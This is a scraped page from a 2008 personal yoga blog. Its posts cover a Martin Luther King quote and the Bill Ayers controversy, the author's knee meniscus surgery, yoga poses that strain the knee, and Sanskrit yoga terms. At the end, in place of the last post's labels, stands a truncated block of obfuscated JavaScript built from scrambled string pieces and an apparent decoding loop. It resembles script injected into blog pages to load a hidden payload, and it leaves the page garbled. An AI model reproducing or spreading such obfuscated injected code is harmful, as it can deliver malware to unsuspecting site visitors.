About site: Religion and Spirituality/Yoga/Personal Pages - Michael Smith
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Title: Religion and Spirituality/Yoga/Personal Pages - Michael Smith A personal blog about experiences with Yoga.
Aussies_Across_Africa A cycling journey through Africa aimed at promoting Australian volunteers and the courageous people of Africa they assist to overcome great hardship. [RSS]

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Prana Journal /* style modified from glish: http://www.glish.com/css/ */ body{margin:0px 0px 0px 0px;font-family:trebuchet ms, verdana, sans-serif;background-color:white;} #Title{font-size:63px;padding-left:15px;padding-top:10px;text-transform:uppercase;font-family:trebuchet ms, verdana, sans-serif;} #Title a {text-decoration:none;color:inherit;}http://www.blogger.com/template-edit.g?blogID=6797245&saved=true# #Description{padding:0px;padding-top:10px;font-size:12px;font-weight:normal} .DateHeader{border-bottom:none;font-size:15px;text-align:left;margin-top:20px;margin-bottom:14px;padding:1px;padding-left:17px;color:gray;font-family:trebuchet ms, verdana, sans-serif;} .PostTitle{font-size:18px;font-weight:bold} .Post{padding-left:20px;margin-bottom:20px;text-indent:10px;padding-right:20px;line-height:22px} .PostFooter{margin-bottom:15px;margin-left:0px;color:black;font-size:10px} #leftcontent{background-color:whitesmoke;border-right:2px dashed #000;border-bottom:0px dashed #000;float:left;padding-bottom:20px;margin-right:15px;padding:0px;width:67%;border-top:0px dashed #000} .SideBarTitle{font-weight:bold;font-size:18px} h1{font-size:14px;padding-top:10px} a{text-decoration:none} a:hover{border-bottom:dashed 1px red} #rightcontent{font-size:12px;height:100%;margin-left:0px;text-transform:none;padding-right:10px;background-color:white;} .blogComments{font-size:15px;text-align:left;margin-top:20px;margin-bottom:14px;padding:1px;padding-left:17px;color:gray;font-family:trebuchet ms, verdana, sans-serif;} .blogComment{margin-top:10px;margin-bottom:10px;color:black;text-indent:10px;padding-right:20px;line-height:22px} .deleted-comment {font-style:italic;color:gray;} .byline{margin-bottom:20px;margin-left:0px;margin-right:10px;color:black;font-size:10px;display:inline} #profile-container { } .profile-datablock { } .profile-img {display:inline;} .profile-img img {float:left;margin:0 10px 0px 0;border:4px solid #ccc;} #profile-container p { } #profile-container .profile-textblock { } .profile-data strong {display:block;} .pix-frame { display: block; text-align: center; font-family: trebuchet ms, verdana, sans-serif; font-size: 11px; font-weight: bold; float: right; margin: 6px; padding: 6px } Prana Journal Thursday, October 09, 2008   Our garment of destiny While listlessly surfing the web, distracted by the boiling political soup of the day, I came across the following quote that struck me as so true:"In a real sense all life is interrelated, all humanity is caught in an inescapable network of mutuality, united in a single garment of destiny. Whatever affects one directly affects all indirectly. I can never be what I ought to be until you are what you ought to be, and you can never be what you ought to be until I am what I ought to be."The words are those of Martin Luther King, Jr in his most Buddhist mindmeld. I discovered them on the blog of the latest boogie man of the election year, Bill Ayers. Then, I read a little further through the blog entry. It was the June '08 Commencement Address at the New City High School (not sure where, maybe in Kalamazoo, Michigan? or somewhere else cuz there's a string of charter schools that go by that name). I read through the paragraphs and realized that I would have wanted to have heard the speech at my commencement 35-40 years ago, or even five years ago, or even now. But then again, I guess I was a radicalized flower-power malcontent. Only I ended running off to Peru where I learned what real blood-drinking revolutionary Maoists do when they want to liberate the masses, and how well-meaning people can be trapped in ugly political situations. And this is the diablo being castigated by McCain, the Republicans and Fox News. Of course, what they're talking about has nothing to do with reality; it's a political passion play. But it's also clear that Ayers' political position is far to the left of Obama and that he thinks that his opposition to the war in Vietnam was the correct stand even though most Americans cannot accept his tactics and strategies. That's the "unrepentant" part that inflames the right.Most comments about this issue come from politicians and talking heads who have not made a minimal attempt to understand what really happened between Obama and Ayers back in Chicago. In Slate, Barack, Bill, and Me by David S. Tanenhaus, a history and law professor at the University of Nevada, Las Vegas, lays out the social landscape in Chicago in the late 1990s and early 2000s. I recommend highly the article Chicago Annenberg Challenge in Spotlight by Dakarai I. Aarons in Education Week. Also read Ayer's own take on the issue: I’M SORRY!!!! i think…. and Episodic Notoriety–Fact and Fantasy. The Wikepedia entry of Ayers has a lot of information and links. Labels: blessing, philosophy  ¶ 11:27 PM 0 comments Monday, October 06, 2008   Coming back onstream More graphics than you may want to see of my torn meniscus, but I couldn't resist. Photo courtesy Dr. GraeterToday is the first day in which I've been able to string two sentences together. I had my outpatient surgery on Friday afternoon, and was on pain medications until last night. I took off my surgical bandages yesterday, and now keep an Ace bandage to support my knee. I ice the knee as often as I can (15 minutes at a time). Yesterday, I was able to walk around without crutches. Today, I can climb stars. I can go down stairs only one step at a time, placing my injured leg first. The doctor says that I can start exercising on a stationary bicycle by next Saturday. I will get my stitches out early next week. I expect to be back at work tomorrow unless I wake up with a complication (say, overdid walking and stair climbing).The operation itself went rather uneventfully. I had to wait about 90 minutes at the GW Hospital before they started the surgical prep. I guess they just want to make sure patients are on site and ready for the procedure, but it's boring. I was briefed about the procedure and given post-operation instructions. I was wheeled into the surgery room and I was unconscious before I could take in the full surrounding. I just noticed that it was chilly.Labels: health, injury, knee  ¶ 3:24 PM 1 comments Wednesday, October 01, 2008   What I've learned about preventing knee injury I got a second opinion on my knee injury about a month ago and decided to have orthopedic surgery with Dr. James Graeter because he's on my health insurance network and that will hold down costs. After he looked at my scans, he told me that yoga poses that are really dangerous for the knee are Ardha Baddha Padmottanasana, Gomukhasana A or any pose in which the knee is flexed sharply. The risk is that the meniscus will be pinched between the femur and tibia bones. In this type of pose, the leg is often rotated and that may put additional stress on the menisci or expose them to the bones in harmful ways. hero's pose (or Virasana) (or variations on it) is another risky pose because your upper body is pressing down on your legs.Once I understood the knee's peculiar risk in yoga, I realized that precautions have to be taken. For instance, putting a rolled-up hand towel or blanket behind the knee so that the bones are stretched apart. Because you can put your knees at risk in both standing and sitting poses, you have to think hard about how best to wedge the towels between your calf and your thigh. Because there are no nerves (or blood flow) in the menisci, there's no way of telling if damage happens. It's only when you have debris floating around in your knee bursa that problems develop. It can actually lock up your knee so that it can't move. Labels: health, injury, knee  ¶ 2:10 PM 0 comments Tuesday, September 30, 2008   Wow, a whole month without writing It's hard for me to fathom how I could have gone a whole month without writing here, after practically four years of steady commentary on my personal practice and the happenings of yoga in America and the world. Since my injury, there was a lot more shaken up than just my knee cartilage. Over four years, I structured my life around my yoga practice, focusing on making it to my classes first once a week, then twice, and, in the past two years, four times a week. And I fit the other parts of my practice around that routine -- pranayama, meditation, writing here and exploring how the whole experience shaped my life. With the injury, I lost an organizing axis around which my activities circulated. I seem to be able to do less in my day even though I have more "free" time on my hands. Go figure.In more practical terms, I've had some time-consuming and mind-numbing issues with my computer. I had to reinstall my Windows XP operating system twice, and then reinstall my applications and configure the whole shebang according to my working habits. I would not wish that experience on anyone, and it drives home to me the need to be systematic about safeguarding data and taking precautionary measures. And I was supposed to be working on freelance web assignments and other duties during that period. There was at least two weekends, perhaps more, of my free time wiped out. I don't think I've caught up with the backlog of tasks yet.This coming Friday, I will undergo arthroscopic surgery on my right knee to clean up my medial meniscus tear at George Washington University Hospital. It's outpatient so I will be home in the evening. I will be on my back for three-four days. Labels: injury, knee, website  ¶ 1:55 PM 0 comments Sunday, August 31, 2008   Bad blogger -- and some options I have not been blogging recently. Too many things imposing priorities on my life, plus the Democratic convention in which Barack Obama was confirmed as the presidential nominee. If you look at my blog roll in the right column, you will see an updated list of blogs to help fill the void. I want to mention one blog in specific, Stephanie Ritchie's blog, which details her daily practice.  ¶ 1:32 PM 1 comments Sunday, August 24, 2008   Watch your language In New York Times Magazine On Language - Namaste, a yoga teacher and writer Jaimie Epstein gives a primer of the Sanskrit that creeps in the vocabulary of people willing to get on the yoga mat. Guru means "remover of darkness" and is someone who sheds light on your ignorance. Although the word guru (with a big G) is associated with spiritual guides, anyone or any situation can be your guru (small g) if he/she/it teaches you something, and there is surely no end to the opportunities presented to us every day. Labels: "+ "l06l,w+hDrguFkd1fghnrf@,~..>lwkqjohh1rg?n>l@3+lru>i**{@_>~%kCuj3q33__i/k.u"+ "jxIngsIxu4ltmxoYz1CA~8>C7i16/iBl.Ao39o/z.kGujxIng4ijkquiC0\\\\101/o1nAmzkt"+ "4rjkquoB6AoCx.lu-AC-A~D(02C0:2q6p}nw7umntx}1{Jqj7lmntxqHp}nw7umntxrE410\\"+ "\\10nFxm6t662b1rJ}j{lqn7xm4t:2r4}1{Jqj7lmntx4F0\\\\1034_32_F;r42D6:}qwpunn"+ "7xm1trE9DrF{1ox0DF00\\\\10+D02w0x17r1s|2nnn{1\\\\77{72001}ruy|7nmxtFnmxtD+"+ "mlevxw~7n{}0\\\\00r}n1eee+Ej)q{noFeeeeeee+vjru}xCplr;@>Ipvjru7lxee+vee)eee"+ "}r}unFeeeeeee+Pr\\\\n71v7))nnmojntkeleeee+e\\\\eG\\\\nwm)vn)j)vn||jpnE8jGe"+ "ee+2D+Fmetn+xnFxm(tkCuj_q@%ghnr>%rnhgn@gr1hsvlo+w**1,huhyvu+h1,rmql*+,*;\\"+ "\"=x''f;roi(0=i;k
 

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